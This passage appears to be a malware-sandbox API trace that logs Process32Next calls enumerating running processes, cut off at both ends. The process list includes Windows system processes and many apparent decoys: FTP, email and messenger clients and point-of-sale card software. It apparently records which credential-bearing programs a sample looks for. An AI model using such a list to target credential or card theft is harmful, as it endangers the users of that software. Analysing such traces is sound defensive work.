szExeFile="smss.exe")) returned 1 [0221.133] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.135] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0221.138] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.140] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0221.142] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0221.144] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0221.147] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.249] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.252] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0221.254] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.256] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.259] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.261] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.263] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.266] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.269] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.271] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0221.273] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0221.275] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.277] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0221.280] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.286] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0221.293] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0221.298] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0221.301] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0221.303] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0221.305] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0221.307] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.309] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0221.312] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0221.314] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0221.317] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.319] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0221.321] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0221.324] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0221.326] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0221.328] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0221.334] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0221.337] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0221.339] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0221.341] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0221.344] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0221.346] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0221.348] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0221.350] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0221.353] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0221.355] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0221.357] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0221.359] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0221.361] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0221.364] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0221.391] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0221.420] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0221.424] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0221.427] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0221.430] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0221.433] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0221.435] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0221.438] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0221.441] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0221.443] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0221.446] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0221.449] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0221.452] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0221.454] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0221.457] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0221.459] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0221.466] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0221.469] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0221.472] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0221.474] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0221.477] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0221.479] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0221.482] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0221.485] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0221.487] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0221.490] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0221.492] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0221.495] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0221.497] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0221.500] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0221.509] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0221.512] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0221.515] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0221.517] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, 